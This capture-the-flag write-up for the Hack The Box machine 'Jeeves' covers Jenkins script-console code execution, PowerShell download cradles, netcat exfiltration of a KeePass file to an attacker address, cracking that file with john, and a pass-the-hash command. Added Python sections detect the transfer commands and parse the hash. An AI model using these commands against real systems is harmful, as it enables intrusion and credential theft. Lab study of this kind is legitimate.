
Summary
This was a fantastic Windows machine that involved deeper enumeration to identify a service running on the non-standard port 50000. With an unauthenticated connection we execute code from the provided console to obtain a foothold as a user. Running winPEAS shows there is a KeePass database, and the privilege exploit checker shows a Juicy Potato exploit.
Processes/Technique
Web app code execution
KeePass database cracking
Windows Data Exfiltration - (Sender) nc -nv 10.10.14.102 6363 < CEH.kdbx - (Listener) nc -nlvp 6363 > CEH.kdbx
Linux ---> Windows File Transfer - powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2:8000/winPEAS.exe', 'winPeas.exe') - With a Linux http.server
Pass the hash - sudo pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //10.129.1.109 cmd.exe
Alternative data stream
Tools Used
Winpeas.exe
John
RPC Dump
Dirbuster
Simple http server
keepass2john library
pth-winexe
References
https://hackersinterview.com/oscp/oscp-cheatsheet-windows-file-transfer-techniques/
https://tzusec.com/cracking-keepass-database/
Enumeration
As always we start off with a basic nmap scan, followed by version enumeration and the use of nmap's default scanning scripts. These are denoted by:
-sC - default scripts
-sV - service version detection
└─$ nmap 10.129.1.109
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-25 17:07 EDT
Nmap scan report for 10.129.1.109
Host is up (0.16s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
445/tcp open microsoft-ds
50000/tcp open ibm-db2
└─$ nmap -sC -sV 10.129.1.109
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-25 17:07 EDT
Nmap scan report for 10.129.1.109
Host is up (0.16s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ask Jeeves
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open http Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows
Port 80 - HTTP webserver
Port 135 - RPC Client
Port 445 - File share
Port 50000 - Jetty 9.4.z-SNAPSHOT
Enumeration Port 80
Port 80 is running Microsoft IIS httpd 10.0, which is very new, so we are unlikely to find public CVEs. Furthermore, the website returns constant errors and has no real content.

Enumeration Port 135
Using Impacket's rpcdump.py I scraped the service for information and found nothing particularly useful.
Enumeration Port 445
smbclient connections required authentication.
smbmap -H also required authentication.

Enumeration Port 50000
Port 50000 is looking like the most likely attack vector.

The default website returns an error and, as far as I can tell, has no default directory, so the next step in the process is to check for hidden directories with DirBuster.
We see that /askjeeves/ is eventually found.

Exploiting Jenkins
This landing page puts us in an authenticated session right off the bat and totally opens the door for exploitation. I know from experience that apps like Jenkins and other code automation servers found on Hack The Box and in the OSCP PWK labs can often be exploited by executing code on the platform through the native script builder or console, given authenticated access.

After poking around, it became apparent that this app uses the Groovy language. So my next focus is "Groovy reverse shells", which turns up an immediate result on GitHub.

This part is simple enough: we copy and paste the code into the script console, entering our specific network information.

Our listener gets the catch upon running the "Build executor" in the Jenkins application. This provides us with user-level privilege and we capture our first flag.

Privilege escalation
The first place to start with privilege escalation is uploading winPEAS, a Windows enumeration script focused on finding privilege escalation opportunities.
This is done by spinning up a python3 http server on the attacking machine.
We can download the file onto Windows with the following command, run on the target Windows machine.
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2:8000/winPEAS.exe', 'winPeas.exe')
Referenced from here
Running winPEAS flags something obvious right at the end of the results screen, relating to KeePass, a common password manager.

Some simple research on KeePass database vulnerabilities yields almost immediate results.

Acquiring keepass.kdbx file
From here we browse to the suggested keepass location of C:\users\kohsuke\documents\CEH.kdbx.

The next step is to exfiltrate this file onto my local machine. After an initial search for binaries on Windows that would help with this, I decided to upload nc.exe. I used the link here to reference the file transfer commands with nc.exe.
The command, run on the Windows machine, to download nc.exe served up with a python3 http.server.
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2:8000/nc.exe', 'nc.exe')
Netcat commands to upload the CEH.kdbx to a target listening server.

Netcat command to receive the upload.
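From the defender's side, both transfer steps above (the WebClient DownloadFile cradle and netcat with a file redirect) leave a recognisable command line in process-creation telemetry. The following is an added Python example, not part of the original writeup: it triages constructed Sysmon-style records for those two patterns and flags a build-server parent process, as happens on this box when the Jenkins script console spawns the shell. The record format, sample lines and parent-process list are assumptions.

```python
import re

# Constructed Sysmon-style process-creation records (Key=Value|...), not real logs.
SAMPLE_EVENTS = [
    "ParentImage=C:\\Program Files\\Jenkins\\jenkins.exe|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2:8000/winPEAS.exe', 'winPeas.exe')",
    "ParentImage=C:\\Windows\\System32\\cmd.exe|Image=C:\\Users\\kohsuke\\nc.exe"
    "|CommandLine=nc.exe -nv 10.10.14.102 6363 < CEH.kdbx",
    "ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\notepad.exe"
    "|CommandLine=notepad.exe C:\\Users\\kohsuke\\Documents\\notes.txt",
]

# Patterns for the two transfer techniques this writeup relies on.
RULES = {
    "webclient_downloadfile": re.compile(r"New-Object\s+System\.Net\.WebClient.*\.DownloadFile\(", re.I),
    "netcat_file_redirect":   re.compile(r"\bnc(\.exe)?\b.*\s[<>]\s*\S+", re.I),
}
# Parents that should not be spawning download cradles (assumed list); a build
# server process is the case here, where the Jenkins script console launched the shell.
UNUSUAL_PARENTS = {"jenkins.exe", "java.exe", "w3wp.exe"}

def parse_event(record: str) -> dict:
    """Split a 'Key=Value|Key=Value' record into a dict."""
    return dict(kv.split("=", 1) for kv in record.split("|") if "=" in kv)

def triage(record: str) -> list:
    """Return the rule names a record trips, plus a parent-process flag when relevant."""
    ev = parse_event(record)
    hits = [name for name, rx in RULES.items() if rx.search(ev.get("CommandLine", ""))]
    parent = ev.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    if hits and parent in UNUSUAL_PARENTS:
        hits.append("unusual_parent:" + parent)
    return hits

if __name__ == "__main__":
    for rec in SAMPLE_EVENTS:
        print(triage(rec) or "clean", "<-", parse_event(rec)["CommandLine"])
```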

Crack the database
Using this blog I found online, https://tzusec.com/cracking-keepass-database/, we can work towards opening this file and pivoting to root.
Extract the hash
First, we extract the hash of the master password using the keepass2john utility that ships with John the Ripper.
keepass2john SecretDB.kdbx
└─$ keepass2john CEH.kdbx
CEH:$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48
└─$ keepass2john CEH.kdbx > hash.txt
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 6000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES, 1=TwoFish, 2=ChaCha]) is 0 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
moonshine1 (CEH)
1g 0:00:00:23 DONE (2021-07-25 21:52) 0.04180g/s 2298p/s 2298c/s 2298C/s mwuah..moonshine1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
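To see what the keepass2john line above actually encodes, and why a database with only 6000 AES-KDF transform rounds fell in 23 seconds, here is an added Python example (not from the original writeup or from John the Ripper) that parses the $keepass$ line into its fields and, from the 2298 p/s john reported, estimates how long a full wordlist pass takes at this and at a higher round count. The rockyou.txt line count and the linear scaling of cost with rounds are assumptions.

```python
from dataclasses import dataclass

# The hash line keepass2john printed for CEH.kdbx earlier on this page.
CEH_HASH = (
    "CEH:$keepass$*2*6000*0*"
    "1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*"
    "3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*"
    "393c97beafd8a820db9142a6a94f03f6*"
    "b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*"
    "cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48"
)
# Algorithm codes as john reports them: 0=AES, 1=TwoFish, 2=ChaCha.
ALGORITHMS = {0: "AES", 1: "TwoFish", 2: "ChaCha"}
# Byte sizes of the five hex fields in a KDBX 2.x line:
# master seed, transform seed, encryption IV, expected start bytes, first encrypted block.
FIELD_SIZES = (32, 32, 16, 32, 32)

@dataclass
class KeePassHash:
    name: str
    version: int
    rounds: int        # AES-KDF transform rounds: the only tunable cost in this line
    algorithm: str
    fields: tuple      # the five binary fields, in the order listed above

def parse_keepass_hash(line: str) -> KeePassHash:
    """Parse a 'name:$keepass$*2*...' line from keepass2john into its parts."""
    name, _, body = line.strip().partition(":")
    parts = body.split("*")
    if parts[0] != "$keepass$" or len(parts) != 9 or parts[1] != "2":
        raise ValueError("not a KDBX 2.x keepass2john line")
    rounds, algo = int(parts[2]), int(parts[3])
    fields = tuple(bytes.fromhex(h) for h in parts[4:])
    if tuple(len(f) for f in fields) != FIELD_SIZES:
        raise ValueError("unexpected field lengths")
    return KeePassHash(name, 2, rounds, ALGORITHMS.get(algo, f"unknown({algo})"), fields)

def estimate_exhaust_seconds(candidates: int, observed_rate: float,
                             observed_rounds: int, target_rounds: int) -> float:
    """Seconds to try every candidate, assuming cost grows linearly with rounds."""
    return candidates / (observed_rate * observed_rounds / target_rounds)

if __name__ == "__main__":
    h = parse_keepass_hash(CEH_HASH)
    print(f"{h.name}: KDBX v{h.version}, {h.algorithm}, {h.rounds} transform rounds")
    ROCKYOU, RATE = 14_344_392, 2298.0   # assumed rockyou.txt size; p/s john reported above
    for rounds in (h.rounds, 6_000_000):
        hours = estimate_exhaust_seconds(ROCKYOU, RATE, h.rounds, rounds) / 3600
        print(f"{rounds:>9} rounds: full rockyou pass in ~{hours:.1f} h")
```

The same arithmetic is what KeePass's "1 second delay" KDF tuning buys a defender: a thousandfold increase in rounds turns a sub-two-hour wordlist pass into months.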
Open the cracked DB
From here I installed keepass2 on my Kali Linux machine.

I tried all the passwords and stuffed them anywhere and everywhere I could. But at the end of the day, the "Backup stuff" password was a possible hash with no username. So I proceeded to attempt to pass the hash, initially with Impacket; however, this was constantly erroring out, so I learned about a new tool, "pth-winexe". This was successful with the "administrator" username appended to the hash and separated with a : or % character. From here we captured the root flag.
sudo pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //10.129.1.109 cmd.exe

Catch 22
Wait a sec! That is not root!

The old "alternate data stream trick". I learned about a variation of this back in high school.